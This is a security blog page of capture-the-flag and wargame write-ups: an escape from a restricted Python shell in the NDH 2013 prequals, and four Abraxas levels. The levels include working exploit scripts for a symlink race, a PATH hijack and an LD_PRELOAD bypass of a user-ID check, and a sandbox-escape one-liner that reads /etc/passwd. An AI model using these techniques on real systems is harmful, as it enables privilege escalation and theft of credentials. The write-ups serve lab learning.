dimanche 10 mars 2013

[NDH2k13] Prequals - Meow (misc)

Hello there,

For NDH Prequals 2k13, the question for today is:

Can I Haz Flag?
(sorry, no screens or logs of all original functions ...)

In the following article, we'll see some Python black magic that will allow us to escape a restricted shell :).

The cat fight problem


Yeah, cat fighting! meeooow!
Basically, we had to connect to it through telnet:
telnet z0b.nuitduhack.com 2323

Then we're welcome by a Meow ASCII art.
Trying 54.228.228.251...
Connected to z0b.nuitduhack.com.
Escape character is '^]'.
 _ __ ___   ___  _____      __
| '_ ` _ \ / _ \/ _ \ \ /\ / /
| | | | | |  __/ (_) \ V  V /
|_| |_| |_|\___|\___/ \_/\_/

Welcome on the only kitten-friendly Python shell.
Please use auth() to authenticate if you need access to
the ultimate furry function.

Some available functions:
 kitty() -- get a kitty
 auth(password) -- authenticate


So we basically are only permitted to use auth() and check() by default.
Yeah, we're basically stuck in a "Python Restricted Shell".


... or not


Digging a bit in builtins, we found out we can use dig():
>>> dir()
['__builtins__', 'auth', 'check', 'fight', 'flipacoin', 'kitty', 'purr', 'status', 'thanks']

Neat! We can basically list any attributes of  most objects (not the restricted one).

auth(password), authenticate the user for the second part of the challenge (Meow Meow) and give us a flag.
check() is the check function.
And thanks() give us this output:
>>> thanks()
Thanks to Guido, Glyph and pyfiglet authors.

The rest isn't really interesting.

With dir(), we can basically look in python intrinsics.


Python intrinsics


We you dir a list for instance, you can see stuffs like that:
>>> dir([])
['__add__', '__class__', '__contains__', '__delattr__', '__delitem__', '__delslice__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__getitem__', '__getslice__', '__gt__', '__hash__', '__iadd__', '__imul__', '__init__', '__iter__', '__le__', '__len__', '__lt__', '__mul__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__reversed__', '__rmul__', '__setattr__', '__setitem__', '__setslice__', '__sizeof__', '__str__', '__subclasshook__', 'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove', 'reverse', 'sort']

All those __name__ things are intrinsics attributes (or methods).
That's how you redefined some ops and all.

Our objectives was to get at some code, either by reading a file or dumping byte code or whatever!
Let's test some stuffs first:

>>> [].__class__.__name__
'list'
>>> [].__class__.__class__.__name__
'type'

Cool, we can have access to type!
It's exciting because we can list what python call "Method Resolution Order" on objects we don't have attributes (such as status, etc) as it will internally call the mro() of these objects.

>>> [].__class__.__class__.mro([].__class__.__class__.__new__([].__class__.__class__, status))
[<class '__main__.Wrapper'>, <type 'object'>]

Now we have the type of status :).
__main__.Wrapper ... just give us a small idea of software architecture.
Yeah, but we wanna create objects or stuffs like import?
For that, we need to see what are the base classes (and maybe go down by creating classes). And the object upon which all Python objects descend? object


object is a neat object

We are going to get object and look at its descendants as it gives us access to the following:
__bases__ intrinsic attribute give use the base object that an object herit from.
__subclasses_() intrisic method give us the object that descend upon that object.


And how we did it:
>>> ().__class__.__bases__[0].__subclasses__()
[<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>,
<type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>,
<type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>,
<type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>,
<type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>,
<type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, 
<type 'property'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, 
<type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>,
<type 'instancemethod'>, <type 'function'>, <type 'classobj'>,
<type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, 
<type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>,
<type 'member_descriptor'>, <type 'sys.floatinfo'>, <type 'EncodingMap'>,
<type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>,
<type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, 
<type 'posix.stat_result'>, <type 'posix.statvfs_result'>, 
<class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>,
<class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>,
<class '_abcoll.Sized'>, <class '_abcoll.Container'>,
<class '_abcoll.Callable'>, <class 'site._Printer'>, <class 'site._Helper'>,
<type 'file'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>,
<class 'codecs.IncrementalDecoder'>, <type '_random.Random'>, <type 'Struct'>,
<type 'time.struct_time'>, <type 'cStringIO.StringO'>,
<type 'cStringIO.StringI'>, <class 'zipfile.ZipInfo'>,
<class 'string.Template'>, <type '_sre.SRE_Pattern'>,
<class 'string.Formatter'>, <type 'functools.partial'>,
<type 'operator.itemgetter'>, <type 'operator.attrgetter'>,
<type 'operator.methodcaller'>, <class 'pyfiglet.FigletFont'>,
<class 'pyfiglet.FigletRenderingEngine'>, <class 'pyfiglet.Figlet'>,
<class 'socket._closedsocket'>, <type '_socket.socket'>,
<type 'method_descriptor'>, <class 'socket._socketobject'>,
<class 'socket._fileobject'>, <class 'twisted.python.compat.tsafe'>,
<class 'twisted.python.versions._inf'>,
<class 'twisted.python.versions.Version'>, <type 'select.epoll'>,
<class 'urlparse.ResultMixin'>, <type 'collections.deque'>,
<type 'deque_iterator'>, <type 'deque_reverse_iterator'>,
<class 'pkg_resources.WorkingSet'>, <class 'pkg_resources.Environment'>,
<class 'pkg_resources.EntryPoint'>, <class 'pkg_resources.Distribution'>,
<type 'thread._local'>, <type 'datetime.tzinfo'>, <type 'datetime.time'>,
<type 'datetime.timedelta'>, <type 'datetime.date'>,
<type 'OpenSSL.SSL.Connection'>, <type 'OpenSSL.SSL.Context'>,
<type 'NetscapeSPKI'>, <type 'PKCS12'>, <type 'PKCS7'>, <type 'X509Extension'>,
<type 'OpenSSL.crypto.PKey'>, <type 'X509Req'>, <type 'X509Store'>,
<type 'X509Name'>, <type 'X509'>,
<class 'twisted.python.deprecate._DeprecatedAttribute'>,
<class 'twisted.python.deprecate._ModuleProxy'>,
<class 'twisted.python.util.SubclassableCStringIO'>, <type 'grp.struct_group'>,
<type 'pwd.struct_passwd'>,
<class 'zope.interface.declarations.ObjectSpecificationDescriptorPy'>,
<class 'zope.interface.declarations.ClassProvidesBasePy'>,
<class 'zope.interface.interface.Element'>,
<class 'zope.interface.interface.SpecificationBasePy'>,
<class 'zope.interface.interface.InterfaceBasePy'>,
<type '_interface_coptimizations.SpecificationBase'>,
<type '_interface_coptimizations.ObjectSpecificationDescriptor'>,
<type '_zope_interface_coptimizations.InterfaceBase'>,
<type '_zope_interface_coptimizations.LookupBase'>,
<class 'threading._Verbose'>, <class 'twisted.python.threadable.DummyLock'>,
<class 'twisted.python.threadable.XLock'>,
<class 'twisted.python.reflect.PropertyAccessor'>,
<class 'twisted.python.log.PythonLoggingObserver'>,
<class 'twisted.python.failure._Traceback'>,
<class 'twisted.python.failure._Frame'>, <class 'twisted.python.failure._Code'>,
<class 'twisted.python.lockfile.FilesystemLock'>,
<class 'twisted.internet.defer._ConcurrencyPrimitive'>,
<class 'twisted.internet.defer.DeferredQueue'>, <type 'itertools.combinations'>,
<type 'itertools.cycle'>, <type 'itertools.dropwhile'>,
<type 'itertools.takewhile'>, <type 'itertools.islice'>,
<type 'itertools.starmap'>, <type 'itertools.imap'>, <type 'itertools.chain'>,
<type 'itertools.ifilter'>, <type 'itertools.ifilterfalse'>,
<type 'itertools.count'>, <type 'itertools.izip'>,
<type 'itertools.izip_longest'>, <type 'itertools.permutations'>,
<type 'itertools.product'>, <type 'itertools.repeat'>,
<type 'itertools.groupby'>, <type 'itertools.tee_dataobject'>,
<type 'itertools.tee'>, <type 'itertools._grouper'>,
<class 'twisted.internet.abstract.FileDescriptor'>,
<class 'twisted.internet.base.ThreadedResolver'>,
<class 'twisted.internet.base._ThreePhaseEvent'>,
<class 'twisted.internet.base.ReactorBase'>,
<class 'twisted.internet.base._SignalReactorMixin'>,
<class 'twisted.internet.address.IPv4Address'>,
<class 'twisted.internet.address.UNIXAddress'>,
<class 'twisted.internet.task.LoopingCall'>,
<class 'twisted.internet.task._Timer'>,
<class 'twisted.internet.task.CooperativeTask'>,
<class 'twisted.internet.task.Cooperator'>,
<class 'twisted.internet.task.Clock'>,
<class 'twisted.internet.tcp._TLSDelayed'>,
<type '_hashlib.HASH'>,
<class 'twisted.internet._sslverify.OpenSSLCertificateOptions'>,
<class 'zope.interface.adapter.BaseAdapterRegistry'>,
<class 'zope.interface.adapter.LookupBasePy'>,
<class 'zope.interface.adapter.AdapterLookupBase'>,
<class 'twisted.python.components._ProxiedClassMethod'>,
<class 'twisted.python.components._ProxyDescriptor'>,
<class 'twisted.internet.process._BaseProcess'>,
<class 'twisted.internet._signals._Handler'>,
<class 'twisted.internet.posixbase._FDWaker'>,
<class '__main__.Wrapper'>, <type '_ast.AST'>, <type 'cell'>]


When I saw that, I was like: Oh My God! *_* beautiful, I can almost create any freaking object I want.

We tried a bunch of stuffs. For instance opening files:
>>> ().__class__.__bases__[0].__subclasses__()[58]('meow.py', 'r')
Internal error: file() constructor not accessible in restricted mode.

We even tried looking at the code:
>>> auth.func_code
<code object auth at 0x7f9ab195b828, file "/opt/meow/challenge.py", line 235>

Yay! We have the real path of the challenge, spent a loooot of time trying to figure out how to read the file. Didn't manage it.

Hell, let's dir() it:

>>> dir(auth.func_code)
['__class__', '__cmp__', '__delattr__', '__doc__', '__eq__', '__format__',
 '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__le__',
 '__lt__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__',
 '__setattr__', '__sizeof__', '__str__', '__subclasshook__', 'co_argcount',
 'co_cellvars', 'co_code', 'co_consts', 'co_filename', 'co_firstlineno',
 'co_flags', 'co_freevars', 'co_lnotab', 'co_name', 'co_names',
 'co_nlocals', 'co_stacksize', 'co_varnames']

There is the co_code that seems interesting but we'll come back to that later.

check() is the same type as auth(), so:

>>> check.func_code.co_consts
(' Check a password.\n\n    :param string password: Secret password.\n    ',
'G', '$', 'K', '!', '%', '@', 'S', '#',
<code object <lambda> at 0x7f9ab195b210, file "/opt/meow/challenge.py", line 127>, '',
<code object <lambda> at 0x7f9ab195b288, file "/opt/meow/challenge.py", line 128>, 14,
'\x00',
<code object xxx at 0x7f9ab195b378, file "/opt/meow/challenge.py", line 131>, 7,
<code object <lambda> at 0x7f9ab195b3f0, file "/opt/meow/challenge.py", line 148>,
'%s', 2, '916F601F6A625DF351086CBCF25BAECA')

Oh, nice, we seem to have something that look like some kind of hash!!!
We tried bruteforce of course (with oclHashcat) but not luck. Back to some reversing.


auth() reverse engineering

Ok back to auth().
In auth, we can get the bytecode with auth.func_code.co_code.
You can disassemble it using the dis module in python (please note that the bytecode change between Python versions). Like so:

import dis
dis.dis('some bytecode here')

I must say that it was when I got lazy.
Doing bytecode translation to python by hand ...
And reconstructing a .pyc ...
Was time to eat.
When I came back, Celelibi came up with something like this:

def check(password):
 array = ['G', '$', 'K', '!', '%', '@', 'S', '#']
 cte = lambda a: ''.join([a[2], a[0], a[6], a[3], a[5], a[7], a[1], a[4]])
 tmp = ''.join(map(lambda x: x.upper(), password[:14]))
 tempPass = ''.join(['\x00' * (14 - len(password)), tmp])
 #xxx = lambda: # ci-dessus
 k = xxx(tempPass[:7])
 d = lambda k: DES.new(k, DES.MODE_ECB)
 obj = d(k)
 h = obj.encrypt(cte(array))
 k = xxx(tempPass[7:])
 obj = d(k)
 h += obj.encrypt(cte(array))
 return '%s' % ''.join([hex(dec)[2:].zfill(2) for dec in [ord(c) for c in h]]).upper() == '916F601F6A625DF351086CBCF25BAECA'



def auth(password):
 if check(password):
  print 'The first flag is: ' + FLAG1
  print 'Also, here is a secret purry function.'
  return 0
 else:
  print 'Wrong password. Meow shfffff.'
  return None

Huh!
WTF!
7 bytes + 7 bytes ... sound like LM Hash.
Let's check our good friend Wikipédia:

     

Algorithm

The LM hash is computed as follows:[1][2]

    The user's password is restricted to a maximum of fourteen characters.[Notes 1]
    The user’s password is converted to uppercase.
    The user's password is encoded in the System OEM Code page[3]
    This password is null-padded to 14 bytes.[4]
    The “fixed-length” password is split into two seven-byte halves.
    These values are used to create two DES keys, one from each 7-byte half, by converting the seven bytes into a bit stream, and inserting a null bit after every seven bits (so 1010100 becomes 01010100). This generates the 64 bits needed for a DES key. (A DES key ostensibly consists of 64 bits; however, only 56 of these are actually used by the algorithm. The null bits added in this step are later discarded.)
    Each of the two keys is used to DES-encrypt the constant ASCII string “KGS!@#$%”,[Notes 2] resulting in two 8-byte ciphertext values. The DES CipherMode should be set to ECB, and PaddingMode should be set to NONE.
    These two ciphertext values are concatenated to form a 16-byte value, which is the LM hash.

It basically use the password as two sets of 7 bytes (56 bits) DES keys.
Perfect for DES since it only uses 56 bits (because of the NSA ...).

So, we can now crack the hash and we get:
LM("SH3|DON'S S0N9") = 916F601F6A625DF351086CBCF25BAECA


Ok great, let's try.

Onto the end of the road

So we enter the password:
>>> auth("SH3|DON'S S0N9")
The first flag is: Int3rnEt1sm4de0fc47
Also, here is a secret purry function.
<function secret at 0x14e8050>

Yeeeeees!
auth() when authenticated, it prints the flag and return a secret() function.
Secret function() is "Meow Meow" challenge ;).

Bonus track

A bug, unintended feature at the beginning (removed during the game):
>>> exec(os.system("/bin/sh", {'__builtins__': {'__import__':__builtins__.__import__}})
Internal error: EOL while scanning string literal ($telnet$, line 1).

Variables were not allowed ... but well we can still create classes:
len([c for c in ().__class__.__bases__[0].__subclasses__() if 'classobj' == c.__name__][0]('Obj', (), {'__len__' : lambda x: 5})())
(we also managed to crushed some variables using list comprehension and such)

Enumeration of dist-packages (found while trying to find a way to import):
>>> ().__class__.__bases__[0].__subclasses__()[91]().find_plugins(().__class__.__bases__[0].__subclasses__()[92]())
([pyasn1 0.0.11a (/usr/lib/pymodules/python2.6),
wsgiref 0.1.2 (/usr/lib/python2.6),
pyfiglet 0.4 (/usr/lib/python2.6/dist-packages),
PAM 0.4.2 (/usr/lib/python2.6/dist-packages),
pyOpenSSL 0.10 (/usr/lib/pymodules/python2.6),
pyglet 1.1.4 (/usr/local/lib/python2.6/dist-packages),
pycrypto 2.1.0 (/usr/lib/python2.6/dist-packages),
pyserial 2.3 (/usr/lib/python2.6/dist-packages),
Python 2.6 (/usr/lib/python2.6/lib-dynload),
Twisted 10.1.0 (/usr/lib/python2.6/dist-packages),
Twisted-Conch 10.1.0 (/usr/lib/python2.6/dist-packages),
Twisted-Core 10.1.0 (/usr/lib/python2.6/dist-packages),
Twisted-Lore 10.1.0 (/usr/lib/python2.6/dist-packages),
Twisted-Mail 10.1.0 (/usr/lib/python2.6/dist-packages),
Twisted-Names 10.1.0 (/usr/lib/python2.6/dist-packages),
Twisted-News 10.1.0 (/usr/lib/python2.6/dist-packages),
Twisted-Runner 10.1.0 (/usr/lib/python2.6/dist-packages),
Twisted-Web 10.1.0 (/usr/lib/python2.6/dist-packages),
Twisted-Words 10.1.0 (/usr/lib/python2.6/dist-packages)],
{zope.interface 3.5.3 (/usr/lib/python2.6/dist-packages):
DistributionNotFound(Requirement.parse('distribute'),)})

And the best for the end: you thought we couldn't open files, execute or import stuffs? Think again:
[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__['__import__']("os").popen("cat /etc/passwd").read()

Got that afterward (with some help). So no, I don't have the source code of the challenge :(.

Conclusion

Of course, we tried many many more stuffs but well, was repetitive: looking around python intrinsics and reading some docs.

heh, you thought you couldn't do anything in restricted shell?
This challenge just proved us wrong.
We can do prolly almost anything with a bit of python wizardry and if not properly restricted.

It also shows that it is REALLY hard to have a fully secure thing.

In the end, we had a really good time,

Hope you enjoyed the article,

Cheers,

m_101

References



- Python types and objects
- Python DataModel
- Python restricted shells 1
- Python restricted shells 2
- Python builtin functions
- Python traceback
- pkg_resources
- Python pointer dereference method 1
- Python pointer dereference method 2

Cool stuffs:
- Mysterie python bytecode decompiler

Other (cool) write-ups:
- Delroth - Escaping a Python sandbox


mercredi 6 mars 2013

[HES 2011] Abraxas Wargame - Level 4

Hello,

Time for level 4 of abraxas,

No useful clues in logbook.

First, let's check the cronjob:
$ cat /etc/cron.d/workpackagebuilder 
*/5 * * * *    level4 /home/level4/bin/make_random_input.sh && /home/level4/bin/workpackagebuilder.pl &> /dev/null

It runs every 5 minutes.

Nothing interesting in /home/level4/bin/make_random_input.sh, it just output some useless ASCII to put in the files.
But /home/level4/bin/workpackagebuilder.pl IS interesting.
#!/usr/bin/perl

$inputdir="/opt/workpackagebuilder/input/";
$templatedir="/opt/workpackagebuilder/templates/"; 
$outputdir="/opt/workpackagebuilder/output"; 
$workdir="/opt/workpackagebuilder/work"; 

$rnd = int(rand(20));
$tmpfile="$workdir/tmpfile$rnd";
$outputfile="$outputdir/workpackage$rnd.bin";

sub readfile($) {
  local ($fn) = @_;
  local $/=undef;
  open FILE, $fn or die "Couldn't open file: $!";
  binmode FILE;
  local $string = <FILE>;
  close FILE;
  return $string;
}

print "Cleaning up $tmpfile\n";
system "rm -rf $workdir/*";

print "Waiting for $tmpfile to be gone ...\n";
sleep 30;

# make sure nothing dirty remains
if(-l "$tmpfile") {
    exit;
}

if(-d "$tmpfile") {
    exit;
}

print "Reading input directory $inputdir\n";

# list all codes in the input dir and write them to a temporary file
opendir(my $dh, $inputdir) || die;
open OUT, ">$tmpfile";
while($f = readdir $dh) {
 if($f =~ /(\d+)_(\S+)/) {
     $code = $2;
     print OUT "$code\n";
 }
}
close OUT;
closedir $dh;

print "Done reading input directory, creating workpackage\n";

# read the list of input codes, and find their matching template
open OUT,">$outputfile";
open IN, "<$tmpfile";
while($code = <IN>) {
    chomp $code;
# if the template exists, use it
    if(-e "$templatedir/$code.bin") {
    print "Using template for $code\n";
    print OUT readfile("$templatedir/$code.bin");
    } else {
# otherwise, flag an error
    print "ERROR for $code\n";
    print OUT readfile("$templatedir/ERROR.bin");
    }
}
close IN;
close OUT;

# make sure all files get backed up
system "touch $outputdir/*";
system "rm -rf $workdir/*";

exit 0;

So basically, it picks a random number between 0 and 20 to create a tmpfile and an output file.
Any package name that is in input/ is outputed in tmpfile.
tmpfile is read line by line in order to get the correct template file that is outputed to output file.

That's all it does.
Before beginning, we ought to know the folders permissions:
$ ls -lash /opt/workpackagebuilder/
total 24K
4.0K drwxr-xr-x 6 root   root   4.0K 2011-04-05 00:07 .
4.0K drwxr-xr-x 4 root   root   4.0K 2011-04-06 10:54 ..
4.0K drwxr-x--- 2 level4 level3 4.0K 2013-03-06 12:20 input
4.0K drwxr-x--- 2 level4 level3 4.0K 2013-03-06 12:20 output
4.0K drwxr-x--- 2 level4 level3 4.0K 2011-04-05 00:07 templates
4.0K drwxrwx--- 2 level4 level3 4.0K 2013-03-06 12:20 work

Ok we can write tou work/ folder (which is where tmpfiles are stored).
We can basically control data in tmpfile.
This data is used to determined the path to a template. We don't need to bother to guess what is the random number ... just generate all 21 files! ;)
Looking at readfile, we can see open(), so I tried a the "| str" or "str |" trick in order to try to execute custom code. No luck, the .bin is forbidding us that.
But it doesn't really matter, we have an arbitrary file read through $code control:
print OUT readfile("$templatedir/$code.bin");

We control $code and readfile() just get the content of the file given in parameter => arbitrary read.
Since it has to finish with .bin extension, we use a symlink to redirect to /etc/pass/level4

The thing is ... tmpfile gets rewritten at some point in the script, just after following comment:
# list all codes in the input dir and write them to a temporary file

We ought to remove any write capabilities from other users then.

To get the correct output file, do a diff before and after the script run (you can't see which file is the last one due to touch command).

And we're set!

Here is the exploit:
#!/bin/sh

while true
do
    rm /opt/workpackagebuilder/work/pwn4.bin
    ln -s /etc/pass/level4 /opt/workpackagebuilder/work/pwn4.bin

    for idx in `seq 0 20`;
    do
        echo "../../../opt/workpackagebuilder/work/pwn4" > "/opt/workpackagebuilder/work/tmpfile$idx"
        chmod a-rxw "/opt/workpackagebuilder/work/tmpfile$idx"
        chmod o+r "/opt/workpackagebuilder/work/tmpfile$idx"
        chmod u+rxw "/opt/workpackagebuilder/work/tmpfile$idx"
    done

done

You just gotta wait every 5 minutes and get the password in the corresponding output file ;).

Cheers,

m_101

[HES 2011] Abraxas Wargame - Level 3

Hello,

Level3, here we come!

Clues from the logbook:
- "she's currently testing with generated datasets."
- "The entire thing is written in bash and runs as a cronjob every 10 minutes."

We look at the cronjob to locate the script:
$ cat /etc/cron.d/lifesupport_process 

*/10 * * * *    level3 /home/level3/bin/lifesupport_process.sh &> /dev/null

We read it:
$ cat /home/level3/bin/lifesupport_process.sh
#!/bin/bash

datadir=/opt/lifesupportdata
scriptdir=/home/level3/bin/

PATH=$datadir:.:$scriptdir:$PATH

cd $scriptdir
. common.inc.sh

# life support stats
data=$($scriptdir/lifesupport_data.sh)

echo    "Orig:      $data"
echo -n "Sorted:    "; mysort $data
echo -n "Sum:       "; sum $data
echo -n "Average:   "; avg $data
echo -n "Max:       "; max $data
echo -n "Min:       "; min $data
echo -n "Cumulated: "; cumul $data

mmm, we can see datadir in PATH! Interesting.
Let's look at its perms:
$ ls -lash /opt/
total 16K
4.0K drwxr-xr-x  4 root root   4.0K 2011-04-06 10:54 .
4.0K drwxr-xr-x 21 root root   4.0K 2011-09-02 14:17 ..
4.0K drwx-wx--x  2 root level2 4.0K 2013-03-06 02:17 lifesupportdata
4.0K drwxr-xr-x  6 root root   4.0K 2011-04-05 00:07 workpackagebuilder

We can write to /opt/lifesupportdata!
So we can use PATH to redirect to out script.
I tried with echo but no luck, so when looking at lifesupport_data.sh:
$ cat /home/level3/bin/lifesupport_data.sh 
#!/bin/bash

# FIXME: There is no kernel module yet to retrieve life support data
# This script just spits out random data, so we can at least test the processing scripts

for i in `seq 1 10`;
do
  echo -n $((RANDOM % 100))
  echo -n " "
done
echo

seq work wonderfully, here is the exploit:
#!/bin/sh

cat << EOF > /opt/lifesupportdata/seq
#!/bin/sh

/bin/cat /etc/pass/level3 > /tmp/lvl3.pass
EOF

chmod a+x /opt/lifesupportdata/seq

And yes, the script run as whatever id you run it at, so you can do anything.
Now, you've just got to wait every 10 minutes ;).

Cheers,

m_101

[HES 2011] Abraxas Wargame - Level 2

Hello,

Time for level 2 :).

Clues from logbook:
"All I learned is that it is written in C and authenticates the user with his user ID."

Heh, should be using getuid(), let's check!

File permissions first:
$ ls -lash /home/level2/bin/
total 16K
4.0K drwxr-xr-x 2 level2 level2 4.0K 2011-04-04 15:28 .
4.0K drwxr-xr-x 3 level2 level2 4.0K 2011-04-04 15:28 ..
8.0K -r-x--x--- 1 level2 level1 7.3K 2011-04-04 15:28 recover

No luck, we can't read it ... but we can still check using strace :).

$ strace /home/level2/bin/recover 
execve("/home/level2/bin/recover", ["/home/level2/bin/recover"], [/* 18 vars */]) = 0
brk(0)                                  = 0x9616000
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7829000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat64(3, {st_mode=S_IFREG|0644, st_size=31341, ...}) = 0
mmap2(NULL, 31341, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7821000
close(3)                                = 0
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY)        = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@n\1\0004\0\0\0"..., 512) = 512
fstat64(3, {st_mode=S_IFREG|0755, st_size=1421892, ...}) = 0
mmap2(NULL, 1427880, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0xb76c4000
mmap2(0xb781b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x157) = 0xb781b000
mmap2(0xb781e000, 10664, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb781e000
close(3)                                = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb76c3000
set_thread_area({entry_number:-1 -> 6, base_addr:0xb76c36c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0
mprotect(0xb781b000, 8192, PROT_READ)   = 0
mprotect(0x8049000, 4096, PROT_READ)    = 0
mprotect(0xb7848000, 4096, PROT_READ)   = 0
munmap(0xb7821000, 31341)               = 0
getuid32()                              = 1001
fstat64(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 0), ...}) = 0
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7828000
write(1, "You are not authorized to execut"..., 77You are not authorized to execute this program (UID = 1001 instead of 1002).
) = 77
exit_group(-1)                          = ?

You can see getuid32()! Bingo!

When we try to execute it, it says:
$ /home/level2/bin/recover 

You are not authorized to execute this program (UID = 1001 instead of 1002).

Bummer ... or not.
If you've been playing with Linux (or any UNIX-like) a bit, you ought to know LD_PRELOAD ;).

Here is the exploit:
#!/bin/sh

cat <<EOF >level1.c
#include <unistd.h>

uid_t getuid (void)
{
    return 1002;
}
EOF

gcc -fPIC -c level1.c -o level1.o
gcc -shared -Wl,-soname,libevil.so.1 -o libevil.so.1.0.1 level1.o
LD_PRELOAD=./libevil.so.1.0.1 /home/level2/bin/recover

Cheers,

m_101

[HES 2011] Abraxas Wargame - Level 1

Hello,

I wanted to play a bit.
I randomly chose to play Abraxas Wargame which was especially made for HES (Hackito Ergo Sum) 2011.

First, you'll need to get it:
http://www.overthewire.org/wargames/abraxas/

And the only (sufficient) clues you got:
http://agent7a69.blogspot.fr/

Ok, now to the game.

For the first level, you got 4 clues in the post concerning it:
"From his design documents, I've been able to gather that he uses XOR for performance reasons and a rolling key of only 4 ASCII characters!"
"The communications module can be acivated through "secure" connection to port 4373."
"The communications module displays a banner with lots of spaces and '#' signs in it, which should make the decryption easier."

Ok, so we have:
- XOR "encryption"
- key of 4 ASCII chars
- port 4373
- spaces or #

What I simply did was to code a network program that connect to the target and XOR the output with 0x20202020 (4 spaces then).

For the XOR, it was test and try, after some time and code tuning I realized that the indexes for the xoring were different, you had the following choices:
- one index local to the function so it is re-initialized at every function call
- two index (write and read) local to the function so it is re-initialized at every function call
- one index defined outside of the function so it keeps its state
- two index (write and read) defined outside of the function so it keeps their state
It was the last solution that worked.

When you XOR with 0x20202020, you end up with the following output:
got 366 bytes

3.00000 [ 0.37500 ]

Nfs!dfs!dfs!dfs!dfs!gep"dfs!dep"gep!dfs"gep"Nfs!dfs!dfs!dfs!dfs!ges!ges!dep!dfs!dfp"dfs!Nfs!dfs!dfs!dfs!dfs!ges!des!dep"gep!dfs"gep!Nfs!dfs!dfs!dfs!dfs!ges!ges!dep!dfs!dfs!dfp"Nfs!dfs!dfs!dfs!dfs!gep"dfs!dep!dfs!dfp"gep!NLs!dfs!dfs!dfs!dep"gep"gep"gep"gep"gep"gep"gep"gLs!dfs!dfs!dfs!dep!dfn)+&o-%2u-)=rd<o04<mdfs"gLs!dfs!dfs!dfs!dep"gep"gep"gep"gep"gep"gep"gep"gL

We can deduce that the key is "dfs!", let's try! Yes, no bruteforce needed ...
got 473 bytes
2.00000 [ 0.25000 ]
                   ####     ######    #####
                   ##  ##   ##       ##    
                   ##   #   ######    #### 
                   ##  ##   ##           ##
                   ####     ##       ##### 

               ################################
               ##   Communications Control   ##
               ################################

Menu
----

1. Startup communications.
2. Shutdown communications.
3. Logout.

Please select your action >
Here you go :).

This should be sufficient for you to write the code ;).

Hope you enjoyed it,

m_101